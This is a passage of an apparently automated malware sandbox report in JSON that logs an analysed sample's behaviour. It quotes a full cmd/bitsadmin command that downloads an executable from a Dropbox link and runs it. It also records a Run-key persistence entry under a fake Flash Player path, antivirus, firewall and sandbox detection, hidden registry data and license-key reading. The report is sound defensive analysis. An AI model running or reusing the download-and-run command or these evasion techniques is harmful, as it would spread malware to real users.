"category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_171", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\\iuoldw.exe &start %appdata%\\iuoldw.exe\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_232", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\waitfor.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_243", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\bitsadmin.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_447", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Nameless", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_469", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create nameless mutex.", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_info_stealing", "category_desc": "Information Stealing", "operation": "_read_system_data", "operation_desc": "Read system data", "ref_gfncalls": [ { "ref_id": "gfn_1360", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_windows_install_date", "technique_desc": "Read the Windows installation date from registry.", "technique_path": "built_in._info_stealing._read_system_data.vmray_read_windows_install_date", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_info_stealing", "category_desc": "Information Stealing", "operation": "_read_system_data", "operation_desc": "Read system data", "ref_gfncalls": [ { "ref_id": "gfn_1362", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_read_windows_license_by_registry", "technique_desc": "Readout Windows license key.", "technique_path": "built_in._info_stealing._read_system_data.vmray_read_windows_license_by_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "9B4D68961731FE3C22DA08B640799EB6", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1377", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"9B4D68961731FE3C22DA08B640799EB6\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Sandboxie_SingleInstanceMutex_Control", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1387", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Sandboxie_SingleInstanceMutex_Control\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Frz_State", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1388", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Frz_State\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_application_sandbox", "operation_desc": "Try to detect application sandbox", "ref_gfncalls": [ { "ref_id": "gfn_1392", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_wine_by_getprocaddress", "technique_desc": "Possibly trying to detect \"wine\" by calling GetProcAddress() on \"wine_get_unix_file_name\".", "technique_path": "built_in._anti_analysis._detect_application_sandbox.vmray_detect_wine_by_getprocaddress", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1813", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "C2E6ECE9938A43206F172A85684E36DB", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_2741", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"C2E6ECE9938A43206F172A85684E36DB\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_2748", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_2877", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "CEE48AFA231AB21CA6E2437DB844BAD7", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_2878", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"CEE48AFA231AB21CA6E2437DB844BAD7\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "E58EFF540968A436E982FCFA1C0445A2", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3117", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"E58EFF540968A436E982FCFA1C0445A2\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "B3F6E53F120A5BE5825B9C06159BB3F4", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3127", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"B3F6E53F120A5BE5825B9C06159BB3F4\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Currentversion\\Run", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_persistence", "category_desc": "Persistence", "operation": "_install_startup_script", "operation_desc": "Install system startup script or application", "ref_gfncalls": [ { "ref_id": "gfn_3129", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_startup_script_by_registry", "technique_desc": "Add \"\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"\" to windows startup via registry.", "technique_path": "built_in._persistence._install_startup_script.vmray_install_startup_script_by_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "ABC6B5B774FF9FD7F54EC277098C64EE", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3134", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"ABC6B5B774FF9FD7F54EC277098C64EE\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_3142", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 1776 byte in \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci\\Baywkivyl\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_delay_execution", "operation_desc": "Delay execution", "ref_gfncalls": [ { "ref_id": "gfn_3229", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 3, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_delay_execution_by_sleep", "technique_desc": "One thread sleeps more than 5 minutes.", "technique_path": "built_in._anti_analysis._delay_execution.vmray_delay_execution_by_sleep", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "1F4C22565107A34AD73CB0F585F8F77C", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3233", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"1F4C22565107A34AD73CB0F585F8F77C\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "20BC29E135FB9B01285187E3B5593CC8", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_3472", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"20BC29E135FB9B01285187E3B5593CC8\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_4677", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 1776 byte in \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci\\Omegovna\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "4786CF0F1E6E9E20640CE4A22DFFC997", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_8211", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"4786CF0F1E6E9E20640CE4A22DFFC997\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "35D65C8FBCA06952705002450D6712FC", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_8475", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"35D65C8FBCA06952705002450D6712FC\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_av", "operation_desc": "Try to detect antivirus software", "ref_gfncalls": [ { "ref_id": "gfn_4", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_av_by_wmi_query", "technique_desc": "Check for antivirus software via WMI query: \"select * from antivirusproduct\".", "technique_path": "built_in._anti_analysis._detect_av.vmray_detect_av_by_wmi_query", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_anti_analysis", "category_desc": "Anti Analysis", "operation": "_detect_fw", "operation_desc": "Try to detect firewall", "ref_gfncalls": [ { "ref_id": "gfn_12", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_detect_fw_by_wmi_query", "technique_desc": "Check for firewall via WMI query: \"select * from firewallproduct\".", "technique_path": "built_in._anti_analysis._detect_fw.vmray_detect_fw_by_wmi_query", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "A354992B05F4DA0EB1B4AB788E3CE988", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_9173", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"A354992B05F4DA0EB1B4AB788E3CE988\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_9268", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "61AB4C4AE08220DC5911D67B8EFCF107", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_9508", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"61AB4C4AE08220DC5911D67B8EFCF107\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "F063546A5853AF5508DB5A15751DB34A", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_10025", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"F063546A5853AF5508DB5A15751DB34A\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_10029", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 88160 byte in \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci\\Eteg\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_10122", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 200848 byte in \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci\\Eteg\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [ { "operations": [ "write" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [], "version": 1 }, "category": "_hide_tracks", "category_desc": "Hide Tracks", "operation": "_hide_data_in_registry", "operation_desc": "Write large data into the registry", "ref_gfncalls": [ { "ref_id": "gfn_10322", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hide_data_in_registry", "technique_desc": "Hide 295088 byte in \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Acuhci\\Eteg\".", "technique_path": "built_in._hide_tracks._hide_data_in_registry.vmray_hide_data_in_registry", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_12264", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "A63A6CDA308CF3B4F10C6B82D6B9EA5B", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_12395", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"A63A6CDA308CF3B4F10C6B82D6B9EA5B\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "629BC138D148FEC80DAF76D454EF252E", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_12695", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"629BC138D148FEC80DAF76D454EF252E\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_os", "category_desc": "OS", "operation": "_use_encryption_api", "operation_desc": "Use encryption API", "ref_gfncalls": [ { "ref_id": "gfn_13258", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_use_encryption_api", "technique_desc": "Use above average number of encryption APIs.", "technique_path": "built_in._os._use_encryption_api.vmray_use_encryption_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "D3F6CAB61E96B029AD170EEF2C2F89C2", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_19100", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name 